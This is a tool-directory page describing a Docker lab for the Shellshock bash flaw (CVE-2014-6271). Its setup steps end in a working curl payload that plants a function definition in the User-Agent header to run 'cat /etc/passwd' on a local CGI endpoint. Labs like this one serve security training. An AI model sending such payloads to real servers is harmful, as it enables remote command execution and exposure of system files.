Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
docker_CVE-2014-6271. — Docker-based lab to exploit Shellshock (CVE-2014-6271) via a vulnerable CGI endpoint, demonstrating remote command execution in a containerized environment. | Kitploit
Tools/GitHubGitHub/pilou-pilou/docker_cve-2014-6271.
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubpilou-pilou/docker_cve-2014-6271.

docker_CVE-2014-6271.

Docker-based lab to exploit Shellshock (CVE-2014-6271) via a vulnerable CGI endpoint, demonstrating remote command execution in a containerized environment.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
79 years agoNot yet reviewed

docker_CVE-2014-6271.

  1. docker build -t DOCKERIMAGENAME /path/to/dockerfile_directory
  2. docker run -it -d -p 8080:80 DOCKERIMAGENAME
  3. verify execution with: docker ps
  4. verify web server execution: http://localhost:8080
  5. exploit vulnerability : curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \http://localhost:8080/cgi-bin/vulnerable
Download Tool